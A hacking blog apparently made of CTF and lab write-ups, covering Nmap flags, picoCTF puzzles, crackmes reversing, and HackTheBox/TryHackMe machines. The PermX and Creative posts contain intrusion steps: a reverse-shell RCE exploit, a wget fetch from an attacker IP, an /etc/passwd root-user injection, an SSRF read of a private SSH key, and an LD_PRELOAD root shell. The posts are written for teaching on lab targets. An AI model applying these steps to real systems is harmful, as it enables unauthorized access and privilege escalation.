Redacted document.

And we find the flag: picoCTF{C4n_Y0u_S33_m3_fully}

10 Essential Nmap Flags

Wed, 16 Oct 2024 00:00:00 +0000

What is Nmap?

Nmap, short for Network Mapper, is a powerful open-source tool designed for network discovery and security auditing. It’s an essential resource for network administrators, helping them identify devices on their networks, discover open ports, and detect potential vulnerabilities. Cybersecurity professionals and penetration testers frequently rely on Nmap to assess network security and bolster defenses.

Installing Nmap

If you’re using Kali Linux, you’re in luck—Nmap comes pre-installed and ready to go. For other Linux distributions, you can easily install it with the following command:

apt-get install nmap

If you’re on macOS, you can install Nmap using Homebrew:

brew install nmap

For Windows users, detailed installation instructions can be found here.

Useful Nmap Flags

1. OS Detection

Nmap can detect the operating system of a target machine using the -O option. This command identifies the OS based on TCP/IP stack fingerprinting behavior, analyzing how the target responds to various network probes.

nmap -O <target_ip>

2. Scan a Port Range

To scan a specific range of ports, use the -p option. For example, to scan ports 20 to 80:

nmap -p 20-80 <target_ip>

3. Speed Control

Nmap allows you to control the speed of your scans using the -T option. Here’s a quick breakdown of the timing templates:

T0 (Paranoid): Very slow; ideal for stealth and avoiding detection.
T1 (Sneaky): Slightly faster than T0; minimizes detection risk while scanning.
T2 (Polite): Slows scans to conserve bandwidth and reduce load on targets.
T3 (Normal): Default speed; balances speed and stealth for general use.
T4 (Aggressive): Fast scans for stable networks; good for quick assessments.
T5 (Insane): Extremely fast; suitable for high-speed networks but risks detection.

4. Output to File

To save your scan results to a file, you can use the -oN option followed by the desired filename:

nmap -oN output.txt <target_ip>

5. Scan Multiple Targets

You can scan multiple targets by specifying their IPs separated by spaces or by using CIDR notation:

nmap <target_ip1> <target_ip2>
nmap 192.168.1.0/24 # Scan an entire subnet

6. Stealthy Scans

To perform a stealthy scan, you can use SYN scans with the -sS option. This method is less likely to be detected by firewalls:

nmap -sS <target_ip>

7. Scan using a decoy IP address

To obscure your scan’s origin, you can use the decoy option with the -D flag. This sends your packets through a decoy IP:

nmap -D RND:10 <target_ip>

8. Nmap vulnerability scan

Nmap comes with scripts that can help identify vulnerabilities. Use the --script option to run vulnerability scans:

nmap --script=vuln <target_ip>

9. Scan using TCP or UDP protocols

To specify the protocol for your scan, use the -sT option for TCP scans or -sU for UDP scans:

nmap -sT <target_ip> # TCP scan
nmap -sU <target_ip> # UDP scan

Read more about the differences between TCP and UDP here.

10. Service Version Detection

Another impressive capability of Nmap is its ability to detect service versions running on open ports. You can use the -sV option to gather this information:

nmap -sV <target_ip>

Conclusion

Nmap is an invaluable tool for network assessment and security auditing. With its wide array of options, you can uncover vulnerabilities and enhance your network defenses effectively. Whether you’re managing a corporate network, conducting penetration tests, or participating in Capture The Flag (CTF) challenges, mastering Nmap is crucial.

unpackme - PicoCTF Write-Up

Sat, 12 Oct 2024 00:00:00 +0000

Hello! 👋 Today, we’re going to take a look at the ‘unpackme’ challenge on PicoCTF by LT ‘syreal’ Jones. The difficulty level is medium."

Challenge Description

Can you get the flag?

Reverse engineer this binary.

Solution

So, let’s make the binary executable using chmod.

chmod +x unpackme-upx

Now, let’s try running the executable and see what it does.

┌──(printn㉿printn)-[~]
└─$ ./unpackme-upx
What's my favorite number? 1
Sorry, that's not it!

From the first hint, we are asked what UPX is, and a quick search online gives us this: UPX is a free and open-source executable packer that compresses and reduces the size of executable files

So let’s unpack the binaray with UPX.

┌──(printn㉿printn)-[~]
└─$ upx -d unpackme-upx
 Ultimate Packer for eXecutables
 Copyright (C) 1996 - 2024
UPX 4.2.2 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 3rd 2024

 File size Ratio Format Name
 -------------------- ------ ----------- -----------
 1006445 <- 379188 37.68% linux/amd64 unpackme-upx

Unpacked 1 file.

We can now open it up in Ghidra and analyze it with the default settings. After it has analyzed we Ghidra finds the main function:

undefined8 main(void)

{
 long in_FS_OFFSET;
 int local_44;
 char *local_40;
 undefined8 local_38;
 undefined8 local_30;
 undefined8 local_28;
 undefined4 local_20;
 undefined2 local_1c;
 long local_10;

 local_10 = *(long *)(in_FS_OFFSET + 0x28);
 local_38 = 0x4c75257240343a41;
 local_30 = 0x30623e306b6d4146;
 local_28 = 0x6865666430486637;
 local_20 = 0x36636433;
 local_1c = 0x4e;
 printf("What\'s my favorite number? ");
 __isoc99_scanf(&DAT_004b3020,&local_44);
 if (local_44 == 0xb83cb) {
 local_40 = (char *)rotate_encrypt(0,&local_38);
 fputs(local_40,(FILE *)stdout);
 putchar(10);
 free(local_40);
 }
 else {
 puts("Sorry, that\'s not it!");
 }
 if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
 /* WARNING: Subroutine does not return */
 __stack_chk_fail();
 }
 return 0;
}

We see that it checks if our input is the same as 0xb83cb, which is encrypted in base 16 (hexadecimal). Converting it to base 10, we get the number 754635.

┌──(printn㉿printn)-[~]
└─$ ./unpackme-upx
What's my favorite number? 754635
picoCTF{up><_m3_f7w_5769b54e}

And we get the flag 😃: picoCTF{up><_m3_f7w_5769b54e}

Plumbing - PicoCTF Write-Up

Wed, 09 Oct 2024 00:00:00 +0000

Hello👋 Today we’re going to take a look at the challenge Plumbing on PicoCTF by Alex Fulton & Danny Tunitis. The difficulty is medium.

Challenge Description

Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to jupiter.challenges.picoctf.org 4427.

Solution

When we connect to jupiter.challenges.picoctf.org 4427 we’re given a bunch of lines saying this is not the flag.

┌──(printn㉿printn)-[~]
└─$ nc jupiter.challenges.picoctf.org 4427
Not a flag either
Not a flag either
Again, I really don't think this is a flag
Again, I really don't think this is a flag
This is defintely not a flag
I don't think this is a flag either
Not a flag either
Not a flag either
Not a flag either
Again, I really don't think this is a flag
I don't think this is a flag either
Not a flag either
This is defintely not a flag
Again, I really don't think this is a flag
Again, I really don't think this is a flag
Not a flag either
I don't think this is a flag either
Again, I really don't think this is a flag
Not a flag either
Not a flag either
I don't think this is a flag either
Not a flag either
This is defintely not a flag
Not a flag either
Not a flag either
This is defintely not a flag

I tried to find the flag by scrolling through the output but with no luck. Looking at the hints, they say that we must remember the flag format is picoCTF{XXXX} and that we can use pipe.

We can filter out the output by using grep since we know that the flag always starts with picoCTF{. So we should be able to find the flag by using the following command.

──(printn㉿printn)-[~]
└─$ nc jupiter.challenges.picoctf.org 4427 | grep "picoCTF{"
picoCTF{digital_plumb3r_5ea1fbd7}

And we get the flag 🥳

Blame Game - PicoCTF Write-Up

Sat, 05 Oct 2024 00:00:00 +0000

Hello👋 Today we’re going to take a look at the challenge Blame Game on PicoCTF by Jeffery John. The difficulty is easy.

Challenge Description

Someone’s commits seems to be preventing the program from working. Who is it?

You can download the challenge files here:

challenge.zip

Solution

Let’s begin by extracting the contents of the downloaded .zip file and then navigate to the unzipped directory:

unzip challenge.zip
cd drop-in/

Inside this folder, we notice the presence of a .git directory, which indicates that Git version control has been initialized.

┌──(printn㉿printn)-[~/Downloads/drop-in]
└─$ ls -la
total 16
drwxr-xr-x 3 printn printn 4096 Mar 11 2024 .
drwxr-xr-x 3 printn printn 4096 Oct 6 07:24 ..
drwxr-xr-x 8 printn printn 4096 Mar 11 2024 .git
-rw-r--r-- 1 printn printn 22 Mar 11 2024 message.py

The challenge description says that someone made a mistake in the code and we must find out who did it. To check all the changes made to the message.py file in every commit, we can use this command:

git log -p message.py

This command provides the commit history along with patches, showing the modifications made to the specified file.

┌──(printn㉿printn)-[~/Downloads/drop-in]
└─$ git log -p message.py
commit 8c83358c32daee3f8b597d2b853c1d1966b23f0a
Author: picoCTF{@sk_th3_1nt3rn_2c6bf174} <ops@picoctf.com>
Date: Tue Mar 12 00:07:11 2024 +0000

 optimize file size of prod code

diff --git a/message.py b/message.py
index 7df869a..326544a 100644
--- a/message.py
+++ b/message.py
@@ -1 +1 @@
-print("Hello, World!")
+print("Hello, World!"

commit caa945839a2fc0fb52584b559b4e89ac7c46bf54
Author: picoCTF <ops@picoctf.com>
Date: Tue Mar 12 00:07:11 2024 +0000

 create top secret project

diff --git a/message.py b/message.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/message.py
@@ -0,0 +1 @@
+print("Hello, World!")

Flag: picoCTF{@sk_th3_1nt3rn_2c6bf174}

PermX - HackTheBox Write-Up

Sat, 28 Sep 2024 00:00:00 +0000

Hello👋 Today we’re going to take a look at PermX machine on HackTheBox by mtzsec. The difficulty is easy.

We’ll have to start by adding the target IP Adress to our /etc/hosts use nano or vim to edit this.

[YOUR_TARGET_IP] permx.htb

Enumeration

We’ll start by scanning for open ports with Nmap.

We get port 80 and 22, which means there is a website running. There is nothing much of interest on the homepage.

So let’s try to see if there are any interesting directories, we’ll use Gobuster for that.

gobuster dir -u http://permx.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Hmmm. Let’s try to find some subdomains with ffuf.

ffuf -u http://permx.htb -H "Host:FUZZ.permx.htb" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fw 18

And we got something. Let’s try checking lms.permx.htb out. Remember to first add it to our /etc/hosts.

Getting Access

We now know that the website uses Chamilo. Let’s try do a quick search on any exploits on Chamilo. And we find CVE-2023-4220 and a exploit script:

https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc

git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt

Set up a listener with nc -lvnp 443 and then we can run the main.py.

python3 main.py -u http://lms.permx.htb -a revshell

And we get a shell! Now we want to run linpeas to find any vulnerbilities, so let’s start a http server with python on our attacker machine.

python -m http.server

In our shell we run.

wget http://10.10.14.34:8000/linpeas.sh

We get a password from the configuration.php. Now we only need the username to be able to ssh. Which we see is mtz by going to the home directory.

Let’s ssh into mtz with the password 03F6lY3uXAP2bkW8

And we get our first flag!

Privilege Escalation

We start by running sudo -l and we se that we can run /opt/acl.sh as root. Let’s take a look at /opt/acl.sh.

#!/bin/bash

if [ "$#" -ne 3 ]; then
 /usr/bin/echo "Usage: $0 user perm file"
 exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
 /usr/bin/echo "Access denied."
 exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
 /usr/bin/echo "Target must be a file."
 exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

This script lets the user mtz change file permissions for any user, but only for files in the /home/mtz directory. It also blocks us from using path traversal.

What we can do is make a symlink to the /etc/passwd inside the /home/mtz and then add a privileged user.

So we first have to generate a password hash.

mkdir /tmp
cd /tmp
ln -s /etc/passwd passwd
sudo /opt/acl.sh mtz rwx /home/mtz/tmp/passwd
echo 'printn:$1$IeeL.gZ3$gs5hdreEStMsIs6wN.lVn0:0:0:root:/root:/bin/bash' >> /home/mtz/tmp/passwd

After running the commands above our user should now be added to the /etc/passwd. Now we can just su printn with the password printn.

And we get root. We can now get the last flag 🥳

Creative - TryHackMe Write-Up

Mon, 23 Sep 2024 00:00:00 +0000

Introduction

Hello👋 Today we’re going to take a look at Creative room on TryHackMe by sSaadakhtarr. The difficulty is easy.

We’ll have to start by adding the target IP Adress to our /etc/hosts use nano or vim to edit this.

[YOUR_TARGET_IP] creative.thm

We can now take a look at the website http://creative.thm. It looks like a simple html website.

Enumeration

We’ll just start off with a simple Nmap scan. We see that the ports 22 and 80 are open.

Let’s try to find some directories with Gobuster.

gobuster dir -u http://creative.thm -w /usr/share/wordlists/dirbuster/direcotry-list-lowercase-2.3-medium.txt

Hmmm nothing interesting there. Let’s try subdomains.

gobuster vhost -u http://creative.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain creative.thm

We found something. Let’s check it out. Add beta.creative.thm to your /etc/hosts.

Ok, it explains what it does. Let’s test it! I have created a test.txt and setup a python http server. And it connects! We can see that it sends a GET request and on the website it displays the test.txt.

Let’s try and see if we can connect to the localhost (127.0.0.1) of the website. Which returns the content of the page.

Now let’s try to see if there are any ports that are not accesible from the outside. We’ll use ffuf for this. But we first need to make a ports.txt we can do that with seq.

seq 65535 > ports.txt

ffuf -u http://beta.creative.thm/ -w ports.txt -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://localhost:FUZZ" -fw 3

And we got a open port 1337!

Getting Access

Now, with the http://localhost:1337/ payload on http://beta.creative.thm, we are able to get the contents of the web server.

Let’s try going to /home and see what users we got.

We get a user called Saad. Let’s go into Saad’s home folder.

We can see that Saad has a .ssh folder.

Let’s get Saad id_rsa

To get the correct formatting of the id_rsa (to not get any errors when logging in with ssh), you’ll have to view page source and then copy the contents of the id_rsa.

After having copied the id_rsa we have to give 600 permission to the id_rsa.

Looks like we need a passphrase. We can use john to get the password but we first have to convert the id_rsa to a .hash with ssh2john like so.

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Nice! We got the passphrase, now we can ssh into Saad.

And we’re able to get the first flag 😃

Privilege Escalation

After looking a bit around I found Saad’s password in the .bash_history.

We can then see what privileges we have with sudo -L. We see that Saad can run ping as root, but we can’t do much with ping. If we look closely on the sudo -L output, we can see that it contains:

env_keep+=LD_PRELOAD

The LD_PRELOAD environment variable is used to specify shared libraries that should be loaded before others when a program is run. This allows us to override functions in existing libraries. We can leverage this feature to inject malicious code into a process running with elevated privileges.

#include <stdlib.h>

void _init() {
 unsetenv("LD_PRELOAD");
 system("/bin/sh");
}

Next we’ll have to compile it.

gcc -fPIC -shared -o escalate.so escalate.c -nostartfiles

Finally, we run the ping command with our LD_PRELOAD variable pointing to our malicious library

sudo LD_PRELOAD=/tmp/escalate.so /usr/bin/ping

And we get root and are able to get the second flag 🥳 This was a fun room, hope you learned something from this write-up. Happy Hacking!

W1seGuy - TryHackMe Write-Up

Wed, 18 Sep 2024 00:00:00 +0000

Hello👋 Today we’re going to take a look at W1seGuy room on TryHackMe by hadrian3689 and DrGonz0. The difficulty is easy.

What Does It Do?

We’re being told we have to connect to our target machine IP on port 1337 with Netcat. We can see that it gives us an XOR encrypted string and then asks us to provide an encryption key.

Analyzing The Code

We’re provided with a Source.py file. Let’s take a look at it.

import random
import socketserver
import socket, os
import string

flag = open('flag.txt','r').read().strip()

def send_message(server, message):
 enc = message.encode()
 server.send(enc)

def setup(server, key):
 flag = 'THM{thisisafakeflag}'
 xored = ""

 for i in range(0,len(flag)):
 xored += chr(ord(flag[i]) ^ ord(key[i%len(key)]))

 hex_encoded = xored.encode().hex()
 return hex_encoded

def start(server):
 res = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
 key = str(res)
 hex_encoded = setup(server, key)
 send_message(server, "This XOR encoded text has flag 1: " + hex_encoded + "\n")

 send_message(server,"What is the encryption key? ")
 key_answer = server.recv(4096).decode().strip()

 try:
 if key_answer == key:
 send_message(server, "Congrats! That is the correct key! Here is flag 2: " + flag + "\n")
 server.close()
 else:
 send_message(server, 'Close but no cigar' + "\n")
 server.close()
 except:
 send_message(server, "Something went wrong. Please try again. :)\n")
 server.close()

class RequestHandler(socketserver.BaseRequestHandler):
 def handle(self):
 start(self.request)

if __name__ == '__main__':
 socketserver.ThreadingTCPServer.allow_reuse_address = True
 server = socketserver.ThreadingTCPServer(('0.0.0.0', 1337), RequestHandler)
 server.serve_forever()

In the code, the encryption method used is called XOR encryption. This means that each character in the flag is changed by combining it with a character from a key using a special operation called XOR. Learn more about XOR encryption here.

The key is 5 characters long, and if the flag is longer than the key, the key starts over from the beginning.

Our goal is to figure out the key and then get back the original flag from the encrypted message.

Since we know the flag starts with “THM{” we can easily find the first four characters of the key using the XOR encrypted string. To find the fifth character of the key, we assume the last character is “}”.

Solution

Copy this code and put it into a .py file.

# Took inspiration from https://github.com/TheSysRat/W1seGuy--THM/blob/main/w1seguy.py
import binascii

def xor_decrypt(hex_string, key):
 encrypted_bytes = binascii.unhexlify(hex_string)
 repeated_key = (key * (len(encrypted_bytes) // len(key) + 1))[:len(encrypted_bytes)]
 return bytes(b ^ ord(repeated_key[i]) for i, b in enumerate(encrypted_bytes)).decode('utf-8')

encrypted_text = input('Hex to decrypt: ')

encrypted_bytes = binascii.unhexlify(encrypted_text)

key = ''.join(chr(encrypted_bytes[i] ^ ord("THM{"[i])) for i in range(len("THM{"))) + \
 ''.join(chr(encrypted_bytes[-i] ^ ord("}")) for i in range(1, len("}") + 1))[:5]

decrypted_message = xor_decrypt(encrypted_text, key)

print(f"Decrypted message: {decrypted_message}")
print(f"Encryption key: {key}")

Connect to the server with Netcat and copy the XOR enctrypted string.

Next we’ll run the decryptor script and paste the string. We’ll get the first flag and also the encryption key for the second flag.

We’ll paste the encryption key and we get the second flag!

good_boy - Crackmes Write-Up

Thu, 08 Aug 2024 00:00:00 +0000

Hello 👋 Today we are going to reverse engineer “good_boy” by fdisotto.

ℹ️

Please try to solve this challenge by yourself first before looking at the solution. If you have tried your best and can’t solve it, then please don’t just take the answer and leave immediately because that is not how you learn reverse engineering.

Prerequisites:

Ghidra
good_boy executable (unzip with password “crackmes.one”)

What does it do?

So the program is very simple it just asks us to provide a password when running it and if we give the false password it calls us a bad boy.

Decompiling with Ghidra

Now we will just open it up in Ghidra and analyze it, we’ll only enable the “Decompiler Parameter ID” and let the rest be on default.

Once analyzed try to find the main function by going to the symbol tree and looking through the functions until we find something that looks like it takes an input.

It looks like FUN_001010c0 is the main function that asks us for the password.

undefined8 FUN_001010c0(void)

{
 long in_FS_OFFSET;
 int local_118;
 short local_114;
 long local_10;

 local_10 = *(long *)(in_FS_OFFSET + 0x28);
 __printf_chk(1,"Enter the password: ");
 __isoc99_scanf("%255s",&local_118);
 if ((local_118 == 0x30783468) && (local_114 == 0x72)) {
 puts("Good boy!");
 }
 else {
 puts("Bad boy!");
 }
 if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
 return 0;
 }
 /* WARNING: Subroutine does not return */
 __stack_chk_fail();
}

Analyzing the code

We see that the variable ’local_118’ holds our input and it then checks if it meets the correct conditions.

When we take a look at the code we see that the correct password is hardcoded in ASCII.

if ((local_118 == 0x30783468) && (local_114 == 0x72)) {
 puts("Good boy!");
}
else {
 puts("Bad boy!");
}

So now we must decode the ASCII and we can do that by just hovering over the ASCII and Ghidra will decode it for you!

0x30783468 = 0x4h
0x72 = r

Running it with the correct password

So now we can provide it with the correct password or can we?

At this point I didn’t know why the password wouldn’t work, so I started searching a bit around and stumbled across the term endianness.

In a little-endian architecture, the least significant byte is stored first. So it expected h4x0 (0x68347830) but because it is stored with litte-endian architecture it is in reverse order 0x4h (0x30783468).

So let’s try typing it in reverse order so the password should be ‘h4x0r’

It works and we got the message Good Boy!

easy_reverse - Crackmes Write-Up

Tue, 06 Aug 2024 00:00:00 +0000

Hello 👋 Today we are going to reverse engineer “easy_reverse” from cbm-hackers.

ℹ️

Prerequisites:

Ghidra
easy_reverse executable (unzip with password “crackmes.one”)

What does it do?

So the program is very simple it just asks us to provide a password when running it.

Decompiling with Ghidra

Now we will just open it up in Ghidra and analyze it, we’ll only enable the “Decompiler Parameter ID” and let the rest be on default.

Once analyzed the main function should automatically pop up in the Decompiled window, if it hasn’t you can find it manually by going to the symbol tree and search for it.

Now we can take a look at the code.

undefined8 main(int param_1,undefined8 *param_2)

{
 size_t sVar1;

 if (param_1 == 2) {
 sVar1 = strlen((char *)param_2[1]);
 if (sVar1 == 10) {
 if (*(char *)(param_2[1] + 4) == '@') {
 puts("Nice Job!!");
 printf("flag{%s}\n",param_2[1]);
 }
 else {
 usage(*param_2);
 }
 }
 else {
 usage(*param_2);
 }
 }
 else {
 usage(*param_2);
 }
 return 0;
}

Analyzing the code

We see that it checks if our input (param_1) meets the correct conditions. So this should be pretty straight forward 😀

First it checks if our input is 10 characters long.

if (sVar1 == 10) {

If our input is 10 characters long, it will check if the 5th character in our input is a ‘@’ if it is we get the flag.

if (*(char *)(param_2[1] + 4) == '@') {
 puts("Nice Job!!");
 printf("flag{%s}\n",param_2[1]);
}

Running it with the correct password

So now we can construct a password that meets the correct conditions.

It works and we get the flag!

My First Blog Post 🥳

Thu, 20 Jun 2024 00:00:00 +0000

Welcome to my first post on this blog, here is a quick overview of what you can expect:

Walkthroughs: TryHackMe, HackTheBox, CrackMes, PicoCTF etc.
Projects: explaining why and how I made some of my projects.
Random Posts: on topics I find interesting.